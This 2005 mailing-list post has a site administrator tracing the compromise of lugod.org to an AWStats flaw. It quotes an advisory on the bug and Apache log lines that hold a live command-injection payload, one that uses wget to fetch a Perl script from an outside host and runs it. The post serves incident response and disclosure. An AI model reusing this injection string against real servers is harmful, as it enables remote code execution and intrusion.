[vox-tech] lugod.org cracked?
Rod Roark
rod at sunsetsystems.com
Tue Feb 15 14:46:32 PST 2005
In particular:
http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities
which includes this gem:
"An attacker can cause arbitrary commands to be
executed by prefixing them with the "|" character."
-- Rod
On Tuesday 15 February 2005 02:35 pm, Rod Roark wrote:
> I think I found the point of entry. From the lugod.org
> apache log:
>
> 65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
> ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
> 65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
> ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
>
> It seems that more than 11 bugs were fixed in awstats in the
> past 3 weeks, and or course I have not been updating that
> frequently. For now I have disabled awstats, have restarted
> the web server, and am keeping a close eye on it while I do
> more investigation.
>
> -- Rod
More information about the vox-tech
mailing list